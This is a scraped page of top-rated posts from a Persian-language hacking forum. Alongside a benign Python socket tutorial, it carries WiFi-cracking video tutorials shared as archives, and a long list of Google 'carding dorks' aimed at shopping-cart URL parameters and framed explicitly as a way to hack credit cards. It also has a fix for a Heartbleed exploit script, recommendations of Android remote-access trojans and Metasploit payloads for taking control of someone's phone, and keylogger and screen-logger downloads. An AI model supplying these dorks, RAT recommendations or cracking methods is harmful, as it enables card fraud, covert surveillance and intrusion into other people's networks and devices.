    برای ساخت ربات تلگرام نیاز به دو چیز دارید: 1. تسلط بر یک زبان برنامه نویسی مانند php, java, python ,perl و .. 2. خواندن متد های تلگرام در https://core.telegram.org/bots/api زبان برنامه نویسی که کار کردید رو بگید تا بیشتر راهنمایی کنیم.
  35. 1 امتیاز
    تمام آموزش های سوکت پروگرمینگ فارسی برای پایتون سوکت پروگرمینگ جز مباحثی که تو حملات BUFFER OVERFLOW خیلی کاربرد داره ========================================================================================================================================= قسمت اول : sock1.mp4
  36. 1 امتیاز
  37. 1 امتیاز
  38. 1 امتیاز
  39. 1 امتیاز
    چگونه درWI-FI SLAX 4.10.1 توان را به۳۰ دسی بل برسونم میشه دستورش را بگید برای وایرلس هک
  40. 1 امتیاز
    s9py

    تاپیک جامع تست نفوذ Wifi

    درود قسمت نهم , هک وایرلس با رمزگذاری WPA/WPA2 با روش Rogue AP زمانی که وایرلس Access Point ندارد. حجم فشرده : 4.5mg BTT9.rar
  41. 1 امتیاز
    درود هک وایرلس با رمزگذاری WEP با روش Caffe Latte زمانی که وایرلس Access Point ندارد. حجم فشرده : 14mg BTT8.part1.rar BTT8.part2.rar BTT8.part3.rar BTT8.part4.rar
  42. 1 امتیاز
    پارت های پایانی . . . BTT7.part4.rar BTT7.part5.rar BTT7.part6.rar
  43. 1 امتیاز
    درود هک وایرلس با رمزگذاری WEP با روش Hirte Attack زمانی که وایرلس Access Point ندارد. (منظور از فاقد Access point زمانی هست که مثلآ وایرلس با Hotspot یا Virtual Access Point ساخته شده) حجم فشرده : 36mg ادامه پارت ها در پست بعد . . . BTT7.part1.rar BTT7.part2.rar BTT7.part3.rar
  44. 1 امتیاز
    سلام خب تو مرحله های اول و مقدماتی هستیم کد زیر ای پی یک سایت رو پیدا میکنه و در اسم address اون رو ذخیره میکنه میتونید برنامش کنید و در هر دو نسخه پایتون کار میکنه ماژول socket رو راه میندازیم خب اول مسیر مفسر رو درخط اول برنامه که shebang نامیده میشه ، وارد میکنیم . #!/python27 ماژول socket روایمپورت میکنیم برای استفاده از توابع ، دستورات و کلاس های این ماژول . import socket حالا کد اصلی رو مینویسیم : address = socket.gethostbyname('yahoo.com') # basic code تابع gethostbyneme رو از ماژول socket فراخوانی کردیم و مقدار سایت رو در پرانتز قرار دادیم تا برنامه از ماژول socket اول تابع ذکر شده رو فراخوانی کنه و سایت رو به تابع بده و تابع هم بوسیله برقراری ارتباط با سرورسایت ای پی رو در اسم address ذخیره کنه . برای نمایش ای پی از دستور پرینت استفاده میکنیم تا خروجی اسم رو نشون بده: print address میتونیم یذره تنوع به خرج بدیم #!/python27 from socket import gethostbyname print "Enter The URL :\n" URL = raw_input("@> ") # example addr = gethostbyname(URL) print "IP :",addr خطا ها رو میتونید except بزنید.
  45. 1 امتیاز
    Dork Carding – دورک های جدید برای هک کارت های اعتباری ( Master Card – Visa Card – …. ) checkout.asp?UserID= checkout.asp?cartid= checkout.cfm?UserID= checkout.cfm?cartid= checkout.php?UserID= checkout.php?cartid= checkout1.asp?cartid= checkout1.cfm?cartid= checkout1.php?cartid= checkout_confirmed.asp?order_id= checkout_confirmed.cfm?order_id= checkout_confirmed.php?order_id= db/CART/product_details.asp?product_id= db/CART/product_details.php?product_id= eshop.php?id= estore/products.php?cat= garden_equipment/Fruit-Cage/product.asp?pr= garden_equipment/Fruit-Cage/product.php?pr= garden_equipment/pest-weed-control/product.asp?pr= garden_equipment/pest-weed-control/product.php?pr= getbook.asp?bookid= getbook.cfm?bookid= getbook.php?bookid= giftDetail.asp?id= giftDetail.cfm?id= giftDetail.php?id= giftshop/product.php?proid= global/product/product.asp?gubun= global/product/product.php?gubun= goods_detail.asp?data= goods_detail.php?data= goods_detail.php?goodsIdx= inurlrod_detail.php?id= inurlrod_detail.php?id= inurlrod_info.php?id= inurlrod_info.php?id= inurlroduct-item.php?id= inurlroduct-item.php?id= inurlroduct.php?id= inurlroduct.php?id= inurlroduct_ranges_view.php?ID= inurlroduct_ranges_view.php?id= inurlroductdetail.php?id= inurlroductdetail.php?id= inurlroductinfo.php?id= inurlroductinfo.php?id= inurlroduit.php?id= inurlroduit.php?id= inurl:shop.php?do=part&id= inurl:shop.php?do=part&id= inurl:shop_category.php?id= inurl:shopping.php?id= inurl:shopping.php?id= inurl:view_product.php?id= inurl:view_product.php?id= irbeautina/product_detail.asp?product_id= irbeautina/product_detail.php?product_id= item.asp?eid= item.asp?id= item.asp?iid= item.asp?item_id= item.asp?itemid= item.asp?model= item.asp?prodtype= item.asp?shopcd= item.asp?sub_id= item.cfm?eid= item.cfm?item_id= item.cfm?itemid= item.cfm?model= item.cfm?prodtype= item.cfm?shopcd= item.php?SKU= item.php?cat= item.php?code= item.php?eid= item.php?id= item.php?iid= item.php?item= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item.php?sub_id= item/detail.php?num= item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page= itemDesc.asp?CartId= itemDesc.cfm?CartId= itemDesc.php?CartId= item_book.asp?CAT= item_book.php?CAT= item_details.asp?catid= inurl:".php?cat=" intext:"shopping" inurl:".php?cat=" intext:"add to cart" inurl:".php?cat=" intext:"Buy Now" inurl:".php?cat=" intext:"View cart" inurl:".php?cat=" intext:"boutique" inurl:".php?cat=" intext:"/store/" inurl:".php?cat=" intext:"/shop/" inurl:".php?cat=" intext:"Toys" inurl:".php?catid=" inurl:".php?catid=" intext:"View cart" inurl:".php?catid=" intext:"Buy Now" inurl:".php?catid=" intext:"add to cart" inurl:".php?catid=" intext:"shopping" inurl:".php?catid=" intext:"boutique" inurl:".php?catid=" intext:"/store/" inurl:".php?catid=" intext:"/shop/" inurl:".php?catid=" intext:"Toys" inurl:".php?categoryid="
  46. 1 امتیاز
    DeMoN

    باگ خونریزی قلبی

    درود. در ارور گفته که اکسپلویت در لاین یا خط 48 دچار مشکل شده.به احتمال زیاد اکسپلویت نیمه دانلود شده یا در سیستم فایروال یا آنتی ویرویس به لاین گیره داده. اکسپلویت رو ادیت کنید و در خط 48 این کدهارو جایگزین کنید و مجدد استفاده کنید. کدهارو عینا در جای قبلی قرار دهید بدن هیچگونه جابه جایی. (print ' %04x: %-48s %s' % (b, hxdat, pdat برای اینکه دیگه اسمپی به دنبال نداشته باشه اکسپلویت رو کامل پیوست میکنم. موفق باشید heart.rar
  47. 1 امتیاز
    khan

    رات.کلایگر اندروید

    سلام دوست عزیز . خب رات های زیادی هستن برای سیستم عامل های مختلف . رات AndoRat رات بسیار هست واسه اندروید همچنین رات DroidJack که بسیار سرعت بالا و خوبی داره و ساده تره و کاراییش بهتره رات Dendroid هم عالیه و به صورت کامل میتونید گوشی فرد رو کنترل کنید البته برای کسایی که آشنایی با برنامه نویسی ندارن خیلی سخته . همچنین برنامه Metasploit در سیستم عامل های کالی لینوکس و بک ترک یک ابزار اکسپلویت نویسی با کامپایلر ها و مفسر های فراوون دارای حدود 5 پیلود برای اندروید و 3 پیلود برای گوشی های اپل هست و میتونیم از اکسپلویتای مختلفی مثل multi/handler داره و میتونی یک ویروس نفوذی بسازی . ________________________________________________ -- the end --
  48. 1 امتیاز
    سلام دوستان در این اموزش شما یاد میگیرید که چه طور هکر ها با استفاده از ابزار هایی پیش پا افتاده رمز عبور اکات های شما و رمز عبور کارت های بانکی را به سرقت میبرند!!!!!! چون اسفاده از این ابزار ها برای کلاه برداری زیاد شده باید شیوه ی مقابله با این حملات را هم یاد گرفت!! حتما به ویدئو دقت کنید تا اگر فایل مشکوکی برای شما ارسال شده که شبیه به این اموزش بود از باز کردن اون خود داری کنید.اموزش انجام اقدامات لازم برای پیشگیری و مقابله به مثل با این ابزار هارو هم میتونید از لینک زیر یاد بگیرید. رودر رویی با هکر ها به امید روزی که همه به قانون احترام بگزارند آموزش تصویری کار با کیلاگر Dscreet Keylogger 3.0 خود کیلاگر رو از اینجا دانلود کنین http://guardiran.org/index.php?/topic/572-%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%DA%A9%DB%8C%D9%84%D8%A7%DA%AF%D8%B1-dscreet-keylogger/#entry1365 کیفیت : متوسط حجم: 2مگ سطح : مبتدی رمز:guardiran.org موفق باشید guardiran.zip
  49. 1 امتیاز
    Mehran_FLash

    Rapid Screen Logger v 2.0

    Rapid Screen Logger v 2.0.exe به همراه عکس : باتشکر Rapid Screen Logger v 2.0.zip